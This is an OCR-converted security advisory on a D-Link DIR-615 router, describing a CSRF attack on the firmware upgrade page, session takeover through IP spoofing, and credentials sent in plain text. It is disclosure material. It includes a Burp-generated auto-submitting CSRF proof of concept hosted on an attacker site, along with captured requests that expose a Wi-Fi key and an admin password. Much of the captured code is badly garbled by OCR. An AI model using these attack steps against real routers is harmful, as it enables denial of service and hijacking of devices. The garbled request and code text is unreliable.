Qualys Security Advisory QSA-2017-03-12 


March 12, 2017 


D-Link DIR-615 Router Multiple Vulnerabilities 


SYNOPSIS: 


D-Link DIR-615 series router suffers from Multiple Cross-Site-Request-Forgery, Sensitive Information 
Disclosure and Weak IP Based Session Management Vulnerabilities. 


Reference:- http://support.dlink.com/ProductInfo.aspx?m-DIR-615 

CVE: 
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7404 
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7405 


http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7406 


VULNERABILITY DETAILS: 


Lab Setup: 


1. Target Router: DIR-615 Router (Hardware Version: T1, Firmware Version: 20.12PTb01) 
2. Target IP Address: 192.168.100.1 


3. Malicious Site: http://139.XX. XX. XXX 


Vulnerable/Tested Version: 


DIR-615 running latest firmware version 20.12PTbO1 is affected. Other models may also be affected. 


€ © 192.168.100.1/ndex.htm C @ Q Search ZA + ave 


[INT ~| = @ SQL- XSS- Encryptiony Encoding» Other- 
dj Load URL 
Q Split URL 
, Execute 


CO Enable Post data  [ ] Enable Referrer 


are version:T1 Firmware version: 20.12 


Select tanguage 


This page shows the current status and some basic settings of the device. 


DIR-615 
0 01:37:07 
Thu Jan 1 01:37:07 1970 


Vulnerability#1:; Cross Site Request Forgery Vulnerability on Firmware Upgrade Page 


The device does not protect following sensitive page from CSRF attack: 
1. Firmware Upgrade Page: http://192.168.100. I/form2file.htm 


An unauthenticated, remote attacker could host a malicious website that either sends a POST request to 
Firmware Upgrade Page. 


Risk Factor: High 


Impact: 


If a victim is logged in to the Router's Web Interface and visits a malicious site from another tab in the same 
browser, the malicious site then can send requests to the victims Router without knowing the credentials. 


An attacker can host a page which sends POST request to Form2File.htm that tries to upload Firmware to 
victim's Router. This causes router to reboot/crash resulting into Denial of Service. An attacker may succeed in 
uploading a malicious Firmware if he plays little bit around this. 


Proof-Of-Concept: CSRF on Firmware Upgrade Page 
CVSS Score: AV: N/AC: M/AU: N/C: N/I: N/A:C 


1. Capture Firmware update request in BurpSuite Pro. 


Go Cancel || <ir || >\¥ Target: http://192.168.100.1 |.4| | 2 | 
Request Response 
| Raw | Params | Headers | Hex | | Raw | Headers | Hex | HTML | Render | 


POST Zormefile.htm HTTP/1.1 a HTTP/1.1 200 OK 

x Content-Typ 
Server: Virtual We 
Content-Type: text/ html 


jests: 1 «html»«head» 
.0 (Windows NT 10.0; Winé4; x64) AppleWebKit/537.36 (KHTML, «meta HTTP-EQUIV-"Pragma" CONTENT-"no-cache"» 
/56.0.2924.87 Safari/537.3€ <meta http-equiv-"Content-Type" content-"text/html; charset=UTF-8"> 
ent-Type: multipart/form-data; boundary-----WebKitFormBo undar yPXKeHj fmo Yr6Ec2a 
: text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, :q=0.8 <link rel="stylesheet" type="text/css" href="stylemain.css"> 
92.168. 100. 1/upload. htm «script type-"text/javascript" src-"util.js"»«/script» 
«script type-"text/javascript" src="share.js"></script> 
«script» 


document .write("<s"+"cript type-'text/javascript' 
sro='menu.3js?v="+Math. random( )+"'></scr"+"ipt>") ; 
</script > 


<title>Autoboot</title> 
«script» 

var wtime-180; 

function stop() 


DIRE15 DDODeDDDUD?^€/*. ¢<OMon Dec 19 15:24:18 { 

201éOrouter . imgQOO0B@, AND) OO€OwWOOOOO00000..£]020nPcOOOET*] 6 («^ !' Bà [ CO | E* zanDAQwyie clearTimeout(id); 

2210208 } 

O2»hel<£/ . ÜLEHy» àDD có zÜÀÓ«aAE function start() 

óff'£divaDDDnnHes[*r4;? nnHAcc$YZennnáliE)t)]gae|»DJi^V| SzDyDR) ByyOp"D, `; atk? (Ó6gIHeDi { 

J>- yxü*i»*—e^,D F'SSu[DDyE (DKàXD| DgDQ: . . BN_F2£»x@20U Qnóói'p»inoeni if(wtime--180) 

DEOvgE7R1G8 (£D, /neA[ ie, AÍFÓ, Y] erqIQ«mp ane { 

üt, Tg=-DOUTT; Seu owsYSeUy_F/' XxOANS9OC< [ FEE-YO>OWEXDE"t i )-VO-n, 8| WOOF +Fle,09°G4 |y ^ wtime = parseInt(document .frm.waitTime.value) ; 7 
Beet Omatches | [2J(«) (H (E) | nee a search term 0 matches 
Done 1,790 bytes | 1,255 millis 


2. Generate CSRF-PoC using BurpSuite Pro 


CSRF PoC generator 


Request to: http://192.168.100.1 


| Raw | Params | Headers | Hex | 


POST HTTP/1.1 E 
Host: 192.168.100.1 


Content-Length: 1327488 

Cache-Control: max-age=0 

Origin: http://192.168.100.1 

Upgrade-Insecure-Requests: 1 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Content-Type: multipart/form-data; boundary-----WebKitFormBoundaryPXKeHjfmoYréEc2a 


Accept: text/html,application/xhtml«xml,application/xml;q-0.9,image/webp, */*;q-0.8 
Referer: hrttn://195.1£R. 100. 1/unlnad. htm X 


a s] n9) e Type a search term | Q matches 


Chrome/56.0.2924.87 Safari/537.36 


CSRF HTML: 

<html> A 
«!-- CSRF PoC - generated by Burp Suite Professional --» 
<body> 
<script>history.pushState('', '', '/')</script> 


<form action="http://192.168.100.1/form2file.htm" method="POST" enctype-"text/plain"» 
<input type="hidden" 

name=""6#45; 6445; #45; &#45; &fí45; 6#45; WebKitFormBoundaryPXKeHj fmoYr 6Ec2 ac# 13 ; #10; Content &fí45; Disposition&ff58; &#32; form&f45; data&f59; c#32;name" 

value="Equot ; downloadé#32; image &#32;file&quot; £859; #32; filename c#é61; &quot; DIR&É45; 615T1&#95; FUZ012PTBO1&f4€; img&quot; c#13; #10; Content <#45; Type &ff58; &#32;applicatio 
né#47; octet é#45; stream&ff 13; 6#10; 6413; &810; DIRELS&#1E0; &80; &80; &#3; &H128; CHO; &H0; &É0; CHO; 6420; CHES; 64148; &#128; &847; &8137; &É 160; &8162; &1t; &#5; Mon&ff32; Dec&#32; 196432; 
156#58;246#58; 185832; 2016&ff0; router&fí46; img&ffO; c#O; &#0; &83; BO&É 191; Ac#O; CHO; «893; CHO; HO; &#128; HO; UGH127; CHO: HO; CHO; CHO; CHO; CHO; &HO; &824; 6#143; £64; #133; BEHI; CHL 
44; GH158; &812; nPC&4; GH29; 8141; ÉÍ 813€; 6893; 66540; #188; £843; &#148; £833; Bü 6091; OGH7; GHLEL; EGH178; ZAG#22; UACWYTGHLE2; &8185; 68158; &#185; &816; £46142; ÓG&H10; &21;2 44187 
Ih&É156;T&lt; GHLE3; £847; &846; U&423; GH140; Hy &gt ; AGH? ; 6428; cózÜlÓ&8 188; AAE CHS; 66835; £433; GH1S8;divacH144; &87; &821; &16; H9&8154; &891; 66179; rA &H1E€; CHES; GHOS; &831; &H1;H 
ÁCt&f36; &8159; &8142; tf 169; &818; &H25; GH30; ATEGHI25; GH134; &8125; #93; gà 169; GHD; 68187; &#25; JI GE 168; V&H 166; 68167; &8191; &3; yG87; Reff 41; ByyOp&quot; &87; &H16€; 686180; &f59 
1885177; K&f 63; #123 ; G6 #182; HE&827; 168182; Ggt; &£150; &#32; yxü&ff42; Tegt; 68135; &f 151; e&H 152; GH184; &#29; GHLED; &É 136; F&Á 168; &f 167; SUGHSL; &#3 1; &# l; VE&É AO; &#143; KAXD&ff92;D 
g&118; Q&f58; GH4E; CHAE; BNGHOS; &£6131; Z&8163; &8187; X 68174; BE#23; U&i 183; Qu 15; OO capos; p&ff155; 1530; O& «80; Ac#13; #22; COw&f 182 ; ETN1G8 £640; EG 529; 68130; 6#47; naf 162; AcH#S1;i 
&&f132; ÀÍFÓ&f 132; 6HLES; &f93; er q10&443; mp&ff96; &813; B&ff5; &8163; 66032; 0&8134; GHISO; Ig&ffe1; &H46; CHILE; OUII&f59; &863; S°UcH179; 6ü&ff 189; &f6159; CHIE; eUycHOS; F&É47; kapos; X&ff16 
4; GHO; AGH143 ; &f 172; SO&H27; C&H 1901; #91; &6131; 6EGÉ173; y&117; &gt; &f 15; WExDE&quot; 6#134; 168/155; &fí45; V&ff26; &f 149; n 68184; &833;B&Ó 124; VO&fB; #135; GH149; «8131; &#124;e6#130; 
E#3; 9° &8140; 46821; p&É2 15; &814; &#134; &#130; DOÓ&f3; GH174; &8148; &#13 1; ÓÀ EH 156; 46&8190; £440; A5&894; &#132; &#141; u&837; &893; AGHSS; V&8174; £130; Y&819; GG23; CE 142; &#45; ée ÀE 
kKH&s61;PO&f 146; L7; &f 191; g1&58 162; CHES; I8 182; GOOgt Zc#133 ; &f23; PWO &63; yXàÓÓ &152; AEPOGH32 ; 1yUuQE &6183; &#187; &f 17; AGHIE; CHL; &H 11; KH 163; n &H92; GH137;66#8; 1 &ffO; üàBY&a 


(23 69) 69 693 [s 


Waming: The CSRF form uses a different encoding type than the onginal request, and so the application may not process the request in the way required. 


IL 


0 matches 


Regenerate | Test in browser | | Copy HTML | | Close | 


Note: Make sure to select Options->CSRF Technique->Plain Text Form and Options->CSRF 
Technique->Include auto-submit script options 


3. Copy this HTML and save it as Burp-CSRF.html under web root on Kali machine. 


Note: I’ve already hosted it on malicious site http://139.XX.XX.XXX/Burp-CSRF.html 
4. Victim logs into Router's Web Interface. 


5. Victim visits http://139.XX.XX.XXX/Burp-CSRF.html 


WiFi Router X © http://139 NN X  FreeFile Sharing by Share By L.. X | + 

€ og 139m X * 2 Sea 
INT Yi e @ SQL- XSS- Encryption" Encoding- Other- 

4m Load URL 

E ^ Split URL 

» Execute 


[C] Enable Post data [_] Enable Referrer 


Submit request 


Note: Victim doesn’t have to click ‘Submit Request’ button as the option ‘Include auto-submit script’ was 
used while generating CSRF POC using BurpSuite. This submits the form automatically on page load. 


Router resets the connection. 


&) WiFi Router X Burp Suite Professional X Free File Sharing by Share By L... X | + 


€ © 192.168.100.1/form2file.htm cC * 


INT “v| æ @ SQL- XSS- Encryption- Encoding- Other- 
& Load URL 
Q Split URL 
>) Execute 


[C] Enable Post data  [ ] Enable Referrer 


Burp Suite Professional 


Error 


Connection reset by peer: socket write error 


Request in BurpSuite: 


Filter: Hiding CSS, image and general binary content 


Host | Method | URL | Params | Edited | Status | Length | MIME t... | Extension | Title Comment | SSL [IP Cookies 
20 http://192.168.100.1 i 200 29332  HTMI htm WLAN Basic Settings L]  192.168.100.1 
2006 http://139 IJ L] 200 4643 HTML html 39 
2007 http://192.168.100.1 w G HTML htm L] 192.168.100.1 


Victim visits malicious page 


Malicious page sends Firmware 
upload request to victim's router 


ee 
Request. RES 


[Raw | Headers | Hex | HTML | Render 
HTTP/1.1 200 OK 


Date: Mon, 13 Mar 2017 10:48:10 GMT 

Server: Apache/2.4.7 (Ubuntu) 

Last-Modified: Mon, 13 Mar 2017 10:26:58 GMT 
ETag: "46d7d4-54aSaZ6bdlf5l-gzip" 
Accept-Ranges: bytes 

Vary: Accept-Encoding 

Connection: close 


Content-Type: text/html 
Content-Length: 4642772 


<html> 
<!-- CSRF PoC - generated by Burp Suite Professional --> 
<body> 
<script>history.pushState('', '', '/')«/script» 
Cee M OO E "ep peser E III 


Type a search term 0 matche: 


wH 


# «| Host | Method | URL Params | Edited | Status | Length | MIME t... | Extension | Title | Comment SSL |IP Cookies 


20 http//192.168.100.1- GET  /wlan_basic.htm O (] 200 29332 HTML htm WLAN Basic Settings Lj 192.168.100.1 
2006 http://139 NN GET  /Burp-CSRF.html E] © 200 4643... HTML html C) 139 


| 2007 


[4X i 


Request 


| Raw | Params | Headers | Hex | 


POST /form2file.htm HTTP/1.1 

Host: 192.168.100.1 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 
Accept: text/html, application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q-0.5 

Accept-Encoding: gzip, deflate 

Referer: http://139. 

Connection: close 

Upgrade-Insecure-Requests: 1 

Content-Type: text/plain 

Content-Length: 1717078 


------ WebKitFormBoundaryPXKeHjfmoYr&éEc2a 
Content-Disposition: form-data; name-"download image file"; filename-"DIR-E15T1 FW2O12PTBOL. img" Firmware being uploaded 
Content-Type: application/octet-stream 


Router is now inaccessible. Also, the Wireless LAN icon in the System Tray indicates that it has connectivity 


issues: 


Vulnerability#2: IP Based Weak Session Management 


Once user is authenticated, this device keeps track of user’s session by using the IP address of his machine. 
An internal attacker could sniff the network traffic to find out if victim is logged into the router. 


Risk Factor: High 


Impact: 


Once authenticated, this device identifies the user based on the source IP address of the victim's host. By 
spoofing the IP address belonging to the victim's host, an attacker might be able to take over the administrative 
session without being prompted for authentication credentials. An attacker can get victim's and router's IP 


address by simply sniffing the network traffic. 


Proof-Of-Concept: 
CVSS Score: AV: N/AC: M/AU: N/C: N/I: C/A:C 


1. Launch Internet Explorer and log into the router's web interface 


eo [-] http://192.168.100.1/index.htm 


Product Page: DIR-615 


p-ó G wiri Router 


Active Client Table 
This page shows the current status and some basic settings of the device. 


Hardware version:T1 


IPV6 Routing Table 


Product Name 
Uptime 
Date/Time 


DIR-615 
0 00:15:38 
Thu Jan 1 00:15:38 1970 


LAN Configuration 


IP Address 
Subnet Mask 
DHCP Server 
MAC Address 


192.168.100.1 
255.255.255.0 
Enable 
3C:1E:04:24:56:BC 


Firmware version: 20.12 


Select Language 


Helpful Hints... 


This page displays a 
summary overview of 
your router status, 
including device 
firmware version 
summary of your 
Internet configuration 
including ethernet 
status. 


2. Now launch Firefox and access http://192.168.100.1/wlan basic.htm 


€ © 192.68.100.1/wlan basichtm c @ Q Search ZA ag 


INT ~] = @ SQL- XSS- Encryption- Encoding» Other- 


x) LoadURL |+,t4}8^LXYrq 
Q Split URL 
») Execute 


[C] Enable Post data Enable Referrer 


Product Page: DIR-6 ray yersion:T1 Firmware ver: 


Select Language 


This page is used to configure the parameters for wireless LAN clients which may connect to your Access Point. Here 
you may change wireless encryption settings as well as wireless network parameters. 


Wireless Network 


Enable SSID Broadcast: [7] 
Enable Wireless Isolation: [ ] 
Name(SSID) : | Jaguar 
Mode : |802.11n v 
Channel: |Auto «| Current Channel: 6 
Band Width : | Auto 20/40M v 


Placement of the 
Router to Optimize 
Wireless 


Security Options Connectivity 


It doesn’t prompt for password. Looking at the request in BurpSuite, it’s not using any Cookie or HTTP 
Basic/Digest authentication for session management. 


oie 


grRaju-ri twee ARS rw eur RRR Terre rene Wow we co 


2188 — http://192.168.100.1 GET /util.js O O 200 38040 script 

2189 http://192.168.100.1 GET /share.js GJ O 200 30315 script 

2190 http://192.168.100.1 GET /menu.js?v=0.3171912422961619 O 200 24569 script 

2192 http://192.168.100.1 GET Iwlanhelp.htm?rnd-0.589331312... LJ 200 3198 script 
|< 


GET /wlan_basic.htm HTTP/1.1 

Host: 192.168.100.1 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WoOW64; rv:52.0) Gecko/20100101 Firefox/52.0 
Accept: text/html, application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http://192.168.100.1/status.htm 

Cookie: 

Connection: close 

Upgrade-Insecure-Requests: 1 


Also, highlighted is the Pre-Shared Key received in response. 


Filter: Hiding CSS, image and general binary content 


# 4| Host | Method | URL | Params | Edited | Status | Length | MIME t... | Extension | Title 
2107 http://192.168.100.1 GET util js O GO 200 38040 script js 
2108 http//192 168.100.1 GET  /sharejs O © 20 30318 script js 
2109 http//192 168.100.1 GET  /menujs?v-0.36457448914999246 (] 200 24569 script js 
2111 http://192.168.100.1 GET /wianhelphtm?md-0.364290469.. (Vj (J 200 3198 script htm 


[Raw | Headers | Hex | wr. | Render | 


</select> 
</td> 
</tr> 
<tr id=tr_psk style=""> 
<td class-form label 35»Pre-Shared Key:«/td» 
<td> 
<input type="text” name-"pskValue" size="32" maxlength="64" 


value=") tA) B^LXTEq" 
>(8-63 characters or 64 hex digits) 


2422. 


An attacker can simply spoof victim's IP address and take over the victim's session. Moreover, if victim has 
web access enabled on his router and is accessing the web interface from different network which is behind 
the NAT/Proxy, an attacker can sniff the network traffic to know the public IP address of the victim's router 
and take over his session as he won't be prompted for credentials. 


Vulnerability#3: Sensitive Information Disclosure 


This device doesn’t use SSL for any of the authenticated pages. Also, it doesn't allow user to generate his 
own SSL Certificate. An attacker can simply monitor network traffic (like an open wireless network), and 
steal user’s credentials and/or credentials of users being added while sniffing the traffic. 


Risk Factor: High 


Impact: 


An attacker can steal user’s credentials to access router’s web interface, thus compromising Confidentiality, 
Integrity and Availability 


Proof-Of-Concept: 
CVSS Score: AV: N/AC: L/AU: N/C: N/I: C/A:C 


1. Log into the router’s web interface. 
2. Credentials submitted in plain text 


Filter: Hiding CSS, image and general binary content 


# 4) Host | Method | URL | Params | Edited Status Length | MIME t... |E 


2156 http://192.168.100.1 GET /login.htm GJ O 200 3436 | HTML h 


e — ————————n—!——!/"" 
[me Params [Headers [rex ] 


POST /login.cgi HTTP/1.1 

Host: 192.168.100.1 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOWE4; rv:52.0) Gecko/20100101 Firefox/52.0 
Accept: text/html,application/xhtml-cxml,application/xml;cdq-0.9,*/*;cq-0.8 
Accept-Language: en-US,en;q-0.5 

Accept-Encoding: gzip, deflate 

Referer: http://192.168.100.1/login.htm 

Cookie: SessionID= 

Connection: close 

Upgrade-Insecure-Requests: 1 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 73 


username-Admin&password-5$2BS$2Ct4$7D855ELXYrq&submit.htm$3Flogin.htm-Login 


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Kapil Khot, Qualys 
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CONTACT: 


For more information about the Qualys Security Research Team, visit our website at 
http://www.qualys.com or send email to research @ qualys.com 
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